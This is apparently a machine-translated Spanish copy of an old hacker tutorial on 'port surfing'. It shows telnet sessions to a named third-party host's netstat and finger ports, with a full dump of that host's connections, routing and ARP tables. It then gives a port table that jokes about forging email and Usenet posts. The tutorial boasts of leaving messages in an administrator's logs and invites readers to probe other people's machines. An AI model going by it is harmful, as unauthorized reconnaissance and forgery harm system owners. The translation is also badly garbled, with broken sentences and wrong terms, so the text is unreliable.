As que para hacer esto, primero ingresar con mi cuenta shell con Southwest
Cyberport. Le di el comando:
<babosa> [66] -> whois nmia.com
Acceso a Internet de Nuevo Mxico (NMIA-DOM)
2201 Buena Vista SE
Albuquerque, NM 87106
Nombre de Dominio: NMIA.COM
Contacto Administrativo, Tcnico Contacto, Zona de Contacto:
Orrell, Stan (SO11) SAO@NMIA.COM
(505) 877-0617
Registro de la ltima actualizacin 11-Mar-94.
Registro creado el 11-Mar-94.
Servidores de dominio en orden indicado:
NS.NMIA.COM 198.59.166.10
GRANDE.NM.ORG 129.121.1.2
Ahora es una buena apuesta que grande.nm.org est cumpliendo una gran
cantidad de otros servidores de Internet junto nmia.com. As es como nos puerto
navegar por nuestra manera de averiguarlo:
<babosa> [67] -> telnet grande.nm.org 15
Tratando 129.121.1.2 ...
Conectado a grande.nm.org.
Carcter de escape es '^]'.
TGV MultiNet V3.5 Rev B, VAX 4000-400, OpenVMS VAX V6.1
Licencia del producto Fecha de Vencimiento de Autorizacin
---------- ------- ------------- --------------MULTINET S A-137-1641 (ninguno)
NFS-CLIENTE S A-137-113237 (ninguno)
*** Configuracin de archivo "MULTINET:
NETWORK_DEVICES.CONFIGURATION" ***
Banderas de dispositivos RSE adaptador Direccin / Vector
------ ------- ----------- -----------SE0 (Compartido VMS Ethernet / FDDI) -ningunos- -ningunosMultiNet Conexiones activas, incluidos los servidores:
Proto RCV-Q Snd-Q Direccin Local (Puerto) Direccin de Relaciones
Exteriores (Puerto) Estado
----- ----- ----- ------------------ ----------------- - ----TCP 0 822 GRANDE.NM.ORG (NETSTAT) 198.59.115.24 (1569)
ESTABLECIDO
TCP 0 0 GRANDE.NM.ORG (POP3) 164.64.201.67 (1256) estableci
TCP 0 0 GRANDE.NM.ORG (4918) 129.121.254.5 (TELNET)
ESTABLECIDO
TCP 0 0 GRANDE.NM.ORG (TELNET) AVATAR.NM.ORG (3141) estableci
TCP 0 0 * (NameService) * (*) ESCUCHAR

TCP 0 0 * (TELNET) * (*) ESCUCHAR


TCP 0 0 * (FTP) * (*) ESCUCHAR
TCP 0 0 * (DEDO) * (*) ESCUCHAR
TCP 0 0 * (NETSTAT) * (*) ESCUCHAR
TCP 0 0 * (SMTP) * (*) ESCUCHAR
TCP 0 0 * (Entrar) * (*) ESCUCHAR
TCP 0 0 * (SHELL) * (*) ESCUCHAR
TCP 0 0 * (EXEC) * (*) ESCUCHAR
TCP 0 0 * (RPC) * (*) ESCUCHAR
TCP 0 0 * (NetControl) * (*) ESCUCHAR
TCP 0 0 * (SYSTAT) * (*) ESCUCHAR
TCP 0 0 * (CHARGEN) * (*) ESCUCHAR
TCP 0 0 * (durante el da) * (*) ESCUCHAR
TCP 0 0 * (TIME) * (*) ESCUCHE
TCP 0 0 * (ECHO) * (*) ESCUCHAR
TCP 0 0 * (DESCARTAR) * (*) ESCUCHAR
TCP 0 0 * (IMPRESORA) * (*) ESCUCHAR
TCP 0 0 * (POP2) * (*) ESCUCHAR
TCP 0 0 * (POP3) * (*) ESCUCHAR
TCP 0 0 * (KERBEROS_MASTER) * (*) ESCUCHAR
TCP 0 0 * (klogin) * (*) ESCUCHAR
TCP 0 0 * (kshell) * (*) ESCUCHAR
TCP 0 0 GRANDE.NM.ORG (4174) OSO.NM.ORG (X11) ESTABLECIDO
TCP 0 0 GRANDE.NM.ORG (4172) OSO.NM.ORG (X11) ESTABLECIDO
TCP 0 0 GRANDE.NM.ORG (4171) OSO.NM.ORG (X11) ESTABLECIDO
TCP 0 0 * (FS) * (*) ESCUCHE
UDP 0 0 * (NameService) * (*)
UDP 0 0 127.0.0.1 (NameService) * (*)
UDP 0 0 GRANDE.NM.OR (NAMESERV) * (*)
UDP 0 0 * (TFTP) * (*)
UDP 0 0 * (bootps) * (*)
UDP 0 0 * (Kerberos) * (*)
UDP 0 0 127.0.0.1 (Kerberos) * (*)
UDP 0 0 GRANDE.NM.OR (Kerberos) * (*)
UDP 0 0 * (*) * (*)
UDP 0 0 * (SNMP) * (*)
UDP 0 0 * (RPC) * (*)
UDP 0 0 * (durante el da) * (*)
UDP 0 0 * (ECHO) * (*)
UDP 0 0 * (DESCARTAR) * (*)
UDP 0 0 * (TIME) * (*)
UDP 0 0 * (CHARGEN) * (*)
UDP 0 0 * (hablar) * (*)
UDP 0 0 * (ntalk) * (*)
UDP 0 0 * (1023) * (*)
UDP 0 0 * (XDMCP) * (*)
MultiNet registrado programas RPC:
Versin Programa Portuario Protocolo
------- ------- -------- ---Portmap 2 TCP 111

Portmap 2 UDP 111


Mesas MultiNet IP Routing:
Destino Banderas de Gateway refcnt Uso Interface MTU
---------- ---------- ----- ------ ----- --------- ---198.59.167.1 LAWRII.NM.ORG arriba, Gateway, H 0 2 SE0 1500
166.45.0.1 ENSS365.NM.ORG arriba, Gateway, H 0 4162 SE0 1500
205.138.138.1 ENSS365.NM.ORG arriba, Gateway, H 0 71 SE0 1500
204.127.160.1 ENSS365.NM.ORG arriba, Gateway, H 0 298 SE0 1500
127.0.0.1 127.0.0.1 para arriba, Host 5 1183513 lo0 4136
198.59.167.2 LAWRII.NM.ORG arriba, Gateway, H 0 640 SE0 1500
192.132.89.2 ENSS365.NM.ORG arriba, Gateway, H 0 729 SE0 1500
207.77.56.2 ENSS365.NM.ORG arriba, Gateway, H 0 5 SE0 1500
204.97.213.2 ENSS365.NM.ORG arriba, Gateway, H 0 2641 SE0 1500
194.90.74.66 ENSS365.NM.ORG arriba, Gateway, H 0 1 SE0 1500
204.252.102.2 ENSS365.NM.ORG arriba, Gateway, H 0 109 SE0 1500
205.160.243.2 ENSS365.NM.ORG arriba, Gateway, H 0 78 SE0 1500
202.213.4.2 ENSS365.NM.ORG arriba, Gateway, H 0 4 SE0 1500
202.216.224.66 ENSS365.NM.ORG arriba, Gateway, H 0 113 SE0 1500
192.132.89.3 ENSS365.NM.ORG arriba, Gateway, H 0 1100 SE0 1500
198.203.196.67 ENSS365.NM.ORG arriba, Gateway, H 0 385 SE0 1500
160.205.13.3 ENSS365.NM.ORG arriba, Gateway, H 0 78 SE0 1500
202.247.107.131 ENSS365.NM.ORG arriba, Gateway, H 0 19 SE0 1500
198.59.167.4 LAWRII.NM.ORG arriba, Gateway, H 0 82 SE0 1500
128.148.157.6 ENSS365.NM.ORG arriba, Gateway, H 0 198 SE0 1500
160.45.10.6 ENSS365.NM.ORG arriba, Gateway, H 0 3 SE0 1500
128.121.50.7 ENSS365.NM.ORG arriba, Gateway, H 0 3052 SE0 1500
206.170.113.8 ENSS365.NM.ORG arriba, Gateway, H 0 1451 SE0 1500
128.148.128.9 ENSS365.NM.ORG arriba, Gateway, H 0 1122 SE0 1500
203.7.132.9 ENSS365.NM.ORG arriba, Gateway, H 0 14 SE0 1500
204.216.57.10 ENSS365.NM.ORG arriba, Gateway, H 0 180 SE0 1500
130.74.1.75 ENSS365.NM.ORG arriba, Gateway, H 0 10117 SE0 1500
206.68.65.15 ENSS365.NM.ORG arriba, Gateway, H 0 249 SE0 1500
129.219.13.81 ENSS365.NM.ORG arriba, Gateway, H 0 547 SE0 1500
204.255.246.18 ENSS365.NM.ORG arriba, Gateway, H 0 1125 SE0 1500
160.45.24.21 ENSS365.NM.ORG arriba, Gateway, H 0 97 SE0 1500
206.28.168.21 ENSS365.NM.ORG arriba, Gateway, H 0 2093 SE0 1500
163.179.3.222 ENSS365.NM.ORG arriba, Gateway, H 0 315 SE0 1500
198.109.130.33 ENSS365.NM.ORG arriba, Gateway, H 0 1.825 SE0 1500
199.224.108.33 ENSS365.NM.ORG arriba, Gateway, H 0 11362 SE0 1500
203.7.132.98 ENSS365.NM.ORG arriba, Gateway, H 0 73 SE0 1500
198.111.253.35 ENSS365.NM.ORG arriba, Gateway, H 0 1134 SE0 1500
206.149.24.100 ENSS365.NM.ORG arriba, Gateway, H 0 3397 SE0 1500
165.212.105.106 ENSS365.NM.ORG arriba, Gateway, H 0 17 SE0 1006
205.238.3.241 ENSS365.NM.ORG arriba, Gateway, H 0 69 SE0 1500
198.49.44.242 ENSS365.NM.ORG arriba, Gateway, H 0 25 SE0 1500
194.22.188.242 ENSS365.NM.ORG arriba, Gateway, H 0 20 SE0 1500
164.64.0 LAWRII.NM.ORG arriba, puerta de enlace 1 40377 SE0 1500
0.0.0 ENSS365.NM.ORG arriba, Gateway 2 4728741 SE0 1500
207.66.1 GLORY.NM.ORG arriba, puerta de enlace 0 51 SE0 1500
205.166.1 GLORY.NM.ORG arriba, puerta de enlace 0 1978 SE0 1500

204.134.1 LAWRII.NM.ORG arriba, puerta de enlace 0 54 SE0 1500


204.134.2 GLORY.NM.ORG arriba, puerta de enlace 0 138 SE0 1500
192.132.2 129.121.248.1 para arriba, puerta de enlace 0 6345 SE0 1500
204.134.67 GLORY.NM.ORG arriba, puerta de enlace 0 2022 SE0 1500
206.206.67 GLORY.NM.ORG arriba, puerta de enlace 0 7778 SE0 1500
206.206.68 LAWRII.NM.ORG arriba, puerta de enlace 0 3185 SE0 1500
207.66.5 GLORY.NM.ORG arriba, puerta de enlace 0 626 SE0 1500
204.134.69 GLORY.NM.ORG arriba, puerta de enlace 0 7990 SE0 1500
207.66.6 GLORY.NM.ORG arriba, puerta de enlace 0 53 SE0 1500
204.134.70 LAWRII.NM.ORG arriba, puerta de enlace 0 18011 SE0 1500
192.188.135 GLORY.NM.ORG arriba, puerta de enlace 0 5 SE0 1500
206.206.71 LAWRII.NM.ORG arriba, puerta de enlace 0 2 SE0 1500
204.134.7 GLORY.NM.ORG arriba, puerta de enlace 0 38 SE0 1500
199.89.135 GLORY.NM.ORG arriba, puerta de enlace 0 99 SE0 1500
198.59.136 LAWRII.NM.ORG arriba, puerta de enlace 0 1293 SE0 1500
204.134.9 GLORY.NM.ORG arriba, puerta de enlace 0 21 SE0 1500
204.134.73 GLORY.NM.ORG arriba, puerta de enlace 0 59794 SE0 1500
129.138.0 GLORY.NM.ORG arriba, puerta de enlace 0 5262 SE0 1500
192.92.10 LAWRII.NM.ORG arriba, puerta de enlace 0 163 SE0 1500
206.206.75 LAWRII.NM.ORG arriba, puerta de enlace 0 604 SE0 1500
207.66.13 GLORY.NM.ORG arriba, puerta de enlace 0 1184 SE0 1500
204.134.77 LAWRII.NM.ORG arriba, puerta de enlace 0 3649 SE0 1500
207.66.14 GLORY.NM.ORG arriba, puerta de enlace 0 334 SE0 1500
204.134.78 GLORY.NM.ORG arriba, puerta de enlace 0 239 SE0 1500
204.52.207 GLORY.NM.ORG arriba, puerta de enlace 0 293 SE0 1500
204.134.79 GLORY.NM.ORG arriba, puerta de enlace 0 1294 SE0 1500
192.160.144 LAWRII.NM.ORG arriba, puerta de enlace 0 117 SE0 1500
206.206.80 PENNY.NM.ORG arriba, puerta de enlace 0 4663 SE0 1500
204.134.80 GLORY.NM.ORG arriba, puerta de enlace 0 91 SE0 1500
198.99.209 LAWRII.NM.ORG arriba, puerta de enlace 0 1136 SE0 1500
207.66.17 GLORY.NM.ORG arriba, puerta de enlace 0 24173 SE0 1500
204.134.82 GLORY.NM.ORG arriba, puerta de enlace 0 29766 SE0 1500
192.41.211 GLORY.NM.ORG arriba, puerta de enlace 0 155 SE0 1500
192.189.147 LAWRII.NM.ORG arriba, puerta de enlace 0 3133 SE0 1500
204.134.84 PENNY.NM.ORG arriba, puerta de enlace 0 189 SE0 1500
204.134.87 LAWRII.NM.ORG arriba, puerta de enlace 0 94 SE0 1500
146.88.0 GLORY.NM.ORG arriba, puerta de enlace 0 140 SE0 1500
192.84.24 GLORY.NM.ORG arriba, puerta de enlace 0 3530 SE0 1500
204.134.88 LAWRII.NM.ORG arriba, puerta de enlace 0 136 SE0 1500
198.49.217 GLORY.NM.ORG arriba, puerta de enlace 0 303 SE0 1500
192.132.89 GLORY.NM.ORG arriba, puerta de enlace 0 3513 SE0 1500
198.176.219 GLORY.NM.ORG arriba, puerta de enlace 0 1278 SE0 1500
206.206.92 LAWRII.NM.ORG arriba, puerta de enlace 0 1228 SE0 1500
192.234.220 129.121.1.91 para arriba, puerta de enlace 0 2337 SE0 1500
204.134.92 LAWRII.NM.ORG arriba, puerta de enlace 0 13995 SE0 1500
198.59.157 LAWRII.NM.ORG arriba, puerta de enlace 0 508 SE0 1500
206.206.93 GLORY.NM.ORG arriba, puerta de enlace 0 635 SE0 1500
204.134.93 GLORY.NM.ORG arriba, puerta de enlace 0 907 SE0 1500
198.59.158 LAWRII.NM.ORG arriba, puerta de enlace 0 14214 SE0 1500
198.59.159 LAWRII.NM.ORG arriba, puerta de enlace 0 1806 SE0 1500

204.134.95 PENNY.NM.ORG arriba, puerta de enlace 0 3644 SE0 1500


206.206.96 GLORY.NM.ORG arriba, puerta de enlace 0 990 SE0 1500
206.206.161 LAWRII.NM.ORG arriba, puerta de enlace 0 528 SE0 1500
198.59.97 PENNY.NM.ORG arriba, puerta de enlace 0 55 SE0 1500
198.59.161 LAWRII.NM.ORG arriba, puerta de enlace 0 497 SE0 1500
192.207.226 GLORY.NM.ORG arriba, puerta de enlace 0 93217 SE0 1500
198.59.99 PENNY.NM.ORG arriba, puerta de enlace 0 2 SE0 1500
198.59.163 GLORY.NM.ORG arriba, puerta de enlace 0 3379 SE0 1500
192.133.100 LAWRII.NM.ORG arriba, puerta de enlace 0 3649 SE0 1500
204.134.100 GLORY.NM.ORG arriba, puerta de enlace 0 8 SE0 1500
128.165.0 PENNY.NM.ORG arriba, puerta de enlace 0 15851 SE0 1500
198.59.165 GLORY.NM.ORG arriba, puerta de enlace 0 274 SE0 1500
206.206.165 LAWRII.NM.ORG arriba, puerta de enlace 0 167 SE0 1500
206.206.102 GLORY.NM.ORG arriba, puerta de enlace 0 5316 SE0 1500
160.230.0 LAWRII.NM.ORG arriba, puerta de enlace 0 19408 SE0 1500
206.206.166 LAWRII.NM.ORG arriba, puerta de enlace 0 1756 SE0 1500
205.166.231 GLORY.NM.ORG arriba, puerta de enlace 0 324 SE0 1500
198.59.167 GLORY.NM.ORG arriba, puerta de enlace 0 1568 SE0 1500
206.206.103 GLORY.NM.ORG arriba, puerta de enlace 0 3629 SE0 1500
198.59.168 GLORY.NM.ORG arriba, puerta de enlace 0 9063 SE0 1500
206.206.104 GLORY.NM.ORG arriba, puerta de enlace 0 7333 SE0 1500
206.206.168 GLORY.NM.ORG arriba, puerta de enlace 0 234 SE0 1500
204.134.105 LAWRII.NM.ORG arriba, puerta de enlace 0 4826 SE0 1500
206.206.105 LAWRII.NM.ORG arriba, puerta de enlace 0 422 SE0 1500
204.134.41 LAWRII.NM.ORG arriba, puerta de enlace 0 41782 SE0 1500
206.206.169 GLORY.NM.ORG arriba, puerta de enlace 0 5101 SE0 1500
204.134.42 GLORY.NM.ORG arriba, puerta de enlace 0 10.761 SE0 1500
206.206.170 GLORY.NM.ORG arriba, puerta de enlace 0 916 SE0 1500
198.49.44 GLORY.NM.ORG arriba, puerta de enlace 0 3 SE0 1500
198.59.108 GLORY.NM.ORG arriba, puerta de enlace 0 2129 SE0 1500
204.29.236 GLORY.NM.ORG arriba, puerta de enlace 0 125 SE0 1500
206.206.172 GLORY.NM.ORG arriba, puerta de enlace 0 5839 SE0 1500
204.134.108 GLORY.NM.ORG arriba, puerta de enlace 0 3216 SE0 1500
206.206.173 GLORY.NM.ORG arriba, puerta de enlace 0 374 SE0 1500
198.175.173 LAWRII.NM.ORG arriba, puerta de enlace 0 6227 SE0 1500
198.59.110 GLORY.NM.ORG arriba, puerta de enlace 0 1797 SE0 1500
198.51.238 GLORY.NM.ORG arriba, puerta de enlace 0 1356 SE0 1500
192.136.110 GLORY.NM.ORG arriba, puerta de enlace 0 583 SE0 1500
204.134.48 GLORY.NM.ORG arriba, puerta de enlace 0 42 SE0 1500
198.175.176 LAWRII.NM.ORG arriba, puerta de enlace 0 32 SE0 1500
206.206.114 LAWRII.NM.ORG arriba, puerta de enlace 0 44 SE0 1500
206.206.179 LAWRII.NM.ORG arriba, puerta de enlace 0 14 SE0 1500
198.59.179 PENNY.NM.ORG arriba, puerta de enlace 0 222 SE0 1500
198.59.115 GLORY.NM.ORG arriba, puerta de enlace 1 132 886 1500 SE0
206.206.181 GLORY.NM.ORG arriba, puerta de enlace 0 1354 SE0 1500
206.206.182 SIENNA.NM.ORG arriba, puerta de enlace 0 16 SE0 1500
206.206.118 GLORY.NM.ORG arriba, puerta de enlace 0 3423 SE0 1500
206.206.119 GLORY.NM.ORG arriba, puerta de enlace 0 282 SE0 1500
206.206.183 SIENNA.NM.ORG arriba, puerta de enlace 0 2473 SE0 1500
143.120.0 LAWRII.NM.ORG arriba, puerta de enlace 0 123533 SE0 1500

206.206.184 GLORY.NM.ORG arriba, puerta de enlace 0 1114 SE0 1500


205.167.120 GLORY.NM.ORG arriba, puerta de enlace 0 4202 SE0 1500
206.206.121 GLORY.NM.ORG arriba, puerta de enlace 1 71 SE0 1500
129.121.0 GRANDE.NM.ORG Hasta 12 21658599 SE0 1500
204.134.122 GLORY.NM.ORG arriba, puerta de enlace 0 195 SE0 1500
204.134.58 GLORY.NM.ORG arriba, puerta de enlace 0 7707 SE0 1500
128.123.0 GLORY.NM.ORG arriba, puerta de enlace 0 34416 SE0 1500
204.134.59 GLORY.NM.ORG arriba, puerta de enlace 0 1007 SE0 1500
204.134.124 GLORY.NM.ORG arriba, puerta de enlace 0 37160 SE0 1500
206.206.124 LAWRII.NM.ORG arriba, puerta de enlace 0 79 SE0 1500
206.206.125 PENNY.NM.ORG arriba, puerta de enlace 0 233359 SE0 1500
204.134.126 GLORY.NM.ORG arriba, puerta de enlace 0 497 SE0 1500
206.206.126 LAWRII.NM.ORG arriba, puerta de enlace 0 13644 SE0 1500
204.69.190 GLORY.NM.ORG arriba, puerta de enlace 0 4059 SE0 1500
206.206.190 GLORY.NM.ORG arriba, puerta de enlace 0 1630 SE0 1500
204.134.127 GLORY.NM.ORG arriba, puerta de enlace 0 45621 SE0 1500
206.206.191 GLORY.NM.ORG arriba, puerta de enlace 0 3574 SE0 1500
Mesas MultiNet IPX Routing:
Destino Banderas de Gateway refcnt Uso Interface MTU
---------- ---------- ----- ------ ----- --------- ---Mesa MultiNet ARP:
Anfitrin de direcciones de red Ethernet Direccin Banderas Arp
-------------------------------------------- ------ ---------- --------GLORY.NM.ORG (IP 129.121.1.4) AA: 00: 04: 00: 61: D0 Temporal
[Unknown] (IP 129.121.251.1) 00: C0: 05: 01: 2C: D2 Temporal
NARANJO.NM.ORG (IP 129.121.1.56) 08: 00: 87: 04: 9F: 42 Temporal
CHAMA.NM.ORG (IP 129.121.1.8) AA: 00: 04: 00: 0C: D0 Temporal
[Unknown] (IP 129.121.251.5) AA: 00: 04: 00: D2: D0 Temporal
LAWRII.NM.ORG (IP 129.121.254.10) AA: 00: 04: 00: 5C: D0 Temporal
[Unknown] (IP 129.121.1.91) 00: C0: 05: 01: 2C: D2 Temporal
BRAVO.NM.ORG (IP 129.121.1.6) AA: 00: 04: 00: 0B: D0 Temporal
PENNY.NM.ORG (IP 129.121.1.10) AA: 00: 04: 00: 5F: D0 Temporal
ARRIBA.NM.ORG (IP 129.121.1.14) 08: 00: 2B: BC: C1: A7 temporal
AZUL.NM.ORG (IP 129.121.1.51) 08: 00: 87: 00: A1: D3 Temporal
ENSS365.NM.ORG (IP 129.121.1.3) 00: 00: 0C: 51: EF: 58 Temporal
AVATAR.NM.ORG (IP 129.121.254.1) 08: 00: 5A: 1D: 52: 0D Temporal
[Unknown] (IP 129.121.253.2) 08: 00: 5A: 47: 4A: 1D Temporal
[Unknown] (IP 129.121.254.5) 00: C0: 7B: 5F: 5F: 80 Temporal
CONCHAS.NM.ORG (IP 129.121.1.11) 08: 00: 5A: 47: 4A: 1D Temporal
[Unknown] (IP 129.121.253.10) AA: 00: 04: 00: 4B: D0 Temporal
Estadsticas de interfaz de red MultiNet:
Nombre Mtu direccin de red Ipkts Ierrs Opkts Oerrs Collis
---- --- ------- -------------- ----- ----- ----- ----- - ---SE0 1500 129.121.0 GRANDE.NM.ORG 68.422.948 0 53.492.833 1 0
lo0 4136 127.0.0.1 127.0.0 1188191 0 1188191 0 0
Estadsticas Protocolo MultiNet:
Los paquetes IP recibidos 65264173
22 IP paquetes ms pequeos que el tamao mnimo
6928 fragmentos IP recibidos
4 fragmentos IP timed out

34 IP recibido destinos inalcanzables


704140 paquetes de error ICMP generados
9667 ICMP cdigos de operacin fuera de rango
4170 Mala ICMP sumas de control de paquetes
734363 respuestas ICMP
734363 ICMP paquetes "Echo" recibidos
734363 ICMP paquetes "Echo Reply" enviados
18339 ICMP paquetes "Echo Reply" recibidos
704140 ICMP "destino inalcanzable" paquetes enviados
451243 ICMP "destino inalcanzable" paquetes recibidos
1488 ICMP paquetes "Fuente Quench" recibidos
163911 ICMP paquetes "redirigir" recibidos
189732 ICMP "Tiempo" Super paquetes recibidos
126966 conexiones TCP iniciada
233998 conexiones TCP establecida
132611 conexiones TCP aceptadas
67972 conexiones TCP cayeron
28182 conexiones TCP embrionarias cayeron
269399 conexiones TCP cerradas
10711838 segmentos TCP programado para RTT
10505140 segmentos TCP actualizan RTT
3927264 TCP retrasado ACKs enviados
666 conexiones TCP cayeron debido a retransmitir los tiempos de espera
111040 tiempos de espera de retransmisin TCP
3136 TCP persisten los tiempos de espera
9 TCP persisten gotas de conexin
16850 TCP tiempos de espera de keepalive
1195 sondas keepalive TCP enviados
14392 conexiones TCP cayeron debido a los tiempos de espera KEEPALIVE
28842663 paquetes TCP enviados
12714484 paquetes de datos TCP enviados
1206060086 bytes de datos TCP enviados
58321 paquetes de datos TCP retransmitido
22144036 bytes de datos TCP retransmitidas
6802199 TCP ACK-slo los paquetes enviados
1502 sondas de ventana TCP enviados
483 TCP URG-slo los paquetes enviados
8906175 TCP paquetes slo Ventana-update-enviados
359509 paquetes de control TCP enviados
38675084 paquetes TCP recibidos
28399363 paquetes TCP recibidos en secuencia
1929418386 bytes TCP recibidos en secuencia
25207 paquetes TCP con errores de suma de comprobacin
273374 paquetes TCP eran duplicados
230525708 bytes TCP eran duplicados
3748 paquetes TCP tenan algunos bytes duplicados
493214 bytes TCP eran duplicados parciales
2317156 paquetes TCP estaban fuera de servicio
3151204672 bytes TCP estaban fuera de servicio
1915 paquetes TCP tenan datos despus de la ventana

865443 bytes TCP buscaban ventana


5804 paquetes TCP para conexin ya cerrado
941 paquetes TCP eran sondas ventana
10847459 paquetes TCP ACK tenan
222657 paquetes TCP tenan ACKs duplicados
1 paquete TCP ACKed datos sin enviar
1200274739 bytes TCP acked
141545 paquetes TCP tenan actualizaciones ventana
13 segmentos TCP cayeron debido a PAWS
4658158 segmentos TCP se predijo pura-ACK
24033756 segmentos TCP se predijo-data pura
8087980 TCP fallos de cach PCB
305 Bad sumas de comprobacin de cabecera UDP
17 campos de longitud de datos Bad UDP
23772272 UDP PCB fallos de cach
MultiNet Estadsticas Buffer:
388 de 608 amortiguadores en uso:
30 buffers asignados a datos.
10 buffers de paquetes asignados a las cabeceras.
66 buffers asignados a Estructuras socket.
57 buffers asignados al Protocolo de Control Blocks.
163 buffers asignados a entradas de la tabla de enrutamiento.
2 buffers asignados a Socket nombres y direcciones.
48 buffers asignados al Kernel Fork-Procesos.
2 buffers asignados a Interface Direcciones.
1 bfer asignado a las direcciones de multidifusin.
1 bfer asignado al tiempo de espera rellamadas.
6 buffers asignados a la gestin de memoria.
2 buffers asignados a la Red de TTY bloques de control.
11 de los 43 grupos de pginas en uso.
11 CXBs tomados de los controladores de dispositivos VMS
2 CXBs esperando para volver a los controladores de dispositivo VMS
162 Kbytes asignados a buffers MultiNet (44% en uso).
226 Kbytes de espacio de direcciones bfer asignado (0% del mximo).
Conexion cerrada por anfitrion desconocido.
<babosa> [68] ->
Whoa! Qu fue todo eso?
Lo que hicimos fue telnet al puerto 15 - el puerto: netstat que en algunos equipos
se ejecuta un demonio que le dice a alguien que le importa a caer en casi todo lo
relacionado con la conexin hecha por todos los ordenadores conectados a
Internet a travs de este equipo.
As que desde este aprendimos dos cosas:
1) Grande.nm.org es un equipo muy ocupado e importante.
2) Incluso un equipo muy ocupado e importante puede dejar que el surfista
puerto aleatorio ven a jugar.
As que mi amiga quera probar otro puerto. Suger el puerto dedo, nmero 79.
As que se dio la orden:
<babosa> [68] -> telnet grande.nm.org 79
Tratando 129.121.1.2 ...
Conectado a grande.nm.org.

Carcter de escape es '^]'.


dedo
? Lo sentimos, no pudo encontrar "DEDO"
Conexion cerrada por anfitrion desconocido.
<babosa> [69] -> telnet grande.nm.org 79
Tratando 129.121.1.2 ...
Conectado a grande.nm.org.
Carcter de escape es '^]'.
Ayuda
? Lo sentimos, no pudo encontrar "AYUDA"
Conexion cerrada por anfitrion desconocido.
<babosa> [69] -> telnet grande.nm.org 79
Tratando 129.121.1.2 ...
Conectado a grande.nm.org.
Carcter de escape es '^]'.
?
? Lo sentimos, no pudo encontrar "?"
Conexion cerrada por anfitrion desconocido.
<babosa> [69] -> telnet grande.nm.org 79
Tratando 129.121.1.2 ...
Conectado a grande.nm.org.
Carcter de escape es '^]'.
hombre
? Lo sentimos, no pudo encontrar "MAN"
Conexion cerrada por anfitrion desconocido.
<babosa> [69] ->
Al principio esto parece slo un montn de comandos fallidos. Pero en realidad
esto es bastante fascinante. La razn es que el puerto 79 es, segn las normas
IETF, que se supone para funcionar fingerd, el demonio dedo. As que el
comando "dedo" y grande.nm.org cuando dio dijo? Lo sentimos, pero no pudo
encontrar "DEDO", sabamos que este puerto no estaba siguiendo normas IETF.
Ahora en los ordenadores Que ellos no corren el demonio dedo en absoluto. Esto
se debe a que el dedo tiene propiedades por lo que pueden ser utilizados para
obtener el control total del equipo que dirige.
Pero si el dedo se cierra, y nada ms se est ejecutando en el puerto 79, que
woudl obtenemos la respuesta:
telnet: connect: Connection refused.
Pero en lugar de que nos conectamos y grande.nm.org estaba esperando un
comando.
Ahora lo normal un surfista puerto hace cuando se ejecuta un daemon unfmiliar
es de convencer en revelar lo que los comandos que utiliza. "Ayuda", "?" Y
"hombre" a menudo funciona. Pero no nos ayud.
Pero a pesar de estos comandos no nos ayudan, nos dijeron que el demonio es
probablemente algo sensible. Si fuera un demonio que era para nadie y su
hermano de usar, que nos habra dado instrucciones.
Entonces, qu hacemos ahora? Decidimos ser buenos ciudadanos de Internet y
permanecer fuera de la crcel Decidimos que bamos beter cerrar sesin.
Pero haba un truco que decidimos hacer primero: dejar nuestra marca en el
archivo de registro de la cscara.

El archivo de registro de shell mantiene un registro de todos los comandos del


sistema operativo hechas en un ordenador. El adminsitrator de un equipo
obviamente importante como grande.nm.org es probablemente lo
suficientemente competente para examinar los registros de lo que los comandos
se dan por quin a su ordenador.Especialmente en un puerto tan importante
como para estar ejecutando un misterio, el demonio no IETF. As que todo lo
que los tipos mientras conectados se guardan en un registro.
As que mi amigo se ri con alegra y dej algunos mensajes en el puerto 79
antes de cerrar la sesin. Oh, querida, creo que est enganchado a la
piratera. Hmmm, podra ser una buena manera de conocer a los administradores
de sistemas lindos ...
As, resaca para arriba el puerto! Si quieres navegar, esto es lo bsico:
1) Obtener iniciado sesin en una cuenta shell. Eso es una cuenta con su
proveedor de Internet que le permite dar rdenes Unix. O - ejecutar Linux o
algn otro tipo de Unix en su PC y conectarse a Internet.
2) Dar el "telnet <hostname> <nmero de la nasa>" comando, donde <nombre
de host> es la direccin de Internet de la computadora que wnat para visitar y
<nmero de puerto> es lo ve phun a usted.
3) Si usted recibe la respuesta "conectado a <nombre de host>", luego hacia
arriba de surf!
Los siguientes son algunos de mis puertos favoritos. Es legal e inofensivo para
pagar los visita, siempre y cuando usted no encontrar la manera de obtener la
condicin de superusuario mientras jugaba con ellos. Sin embargo, tenga en
cuenta que si lo hace demasiado surf puerto desde su cuenta de concha, su
administrador de sistemas puede notar esto en su archivo de registro de la
cscara. Si l o ella tiene prejuicios contra la piratera informtica, usted puede
conseguir inici su ISP. As que es posible que desee para explicar de antemano
que son simplemente un hacker aspecto inofensivo para pasar un buen rato, eh,
eh, aprender sobre Unix. Yeh, que suena bien ...
Servicio Nmero de puerto Por qu es Phun!
7 eco Lo que se teclea en, el anfitrin se repite de nuevo a usted, que se utiliza
para el ping
9 deseche Dev / null - qu tan rpido puede usted imaginar esto?
11 Lotes SYSTAT de informacin sobre los usuarios
13 Tiempo durante el da y la fecha en la ubicacin del equipo
15 info netstat Tremendo en las redes, pero rara vez se utiliza ms
19 chargen derrama una corriente de caracteres ASCII. Utilice ^ C para detener.
21 Transfiere archivos ftp
22 ssh shell seguro de inicio de sesin - tnel cifrado
23 telnet Dnde conectarte si no utiliza ssh :)
25 smpt Forge correo electrnico de Bill.Gates@Microsoft.org.
Tiempo: 37 veces
Ubicacin de recursos de 39 rlp
43 Info whois en hosts y redes
Servidor de nombres de dominio 53
70 Gopher fuera de la fecha de informacin cazador
79 dedos Un montn de informacin sobre los usuarios
Servidor Web http 80
110 pop de correo electrnico entrante
119 NNTP grupos de noticias de Usenet - forjan mensajes, cancela

443 SHTTP Otro servidor web


512 notificacin de correo biff
513 rlogin acceso remoto
quien a distancia y tiempo de actividad que
514 comando remoto cscara, utiliza ninguna contrasea!
syslog registro del sistema remoto - cmo busto hackers
520 ruta protocolo de informacin de enrutamiento
**************************
Punta de la cabeza hlice: Tenga en cuenta que en la mayora de los casos un
host de Internet usar estas asignaciones de nmero de puerto para estos
servicios. Ms de un servicio tambin se le puede asignar simultneamente al
mismo puerto. Este sistema de numeracin se ofrece voluntariamente por el
Internet Engineering Task Force (IETF). Eso significa que un host de Internet
puede utilizar otros puertos para estos servicios. Esperar lo inesperado!
Si usted tiene una copia de Linux, puede obtener la lista de todas las
asignaciones de IETF de nmeros de puerto en el archivo / etc / services.
********************************
_________________________________________________________
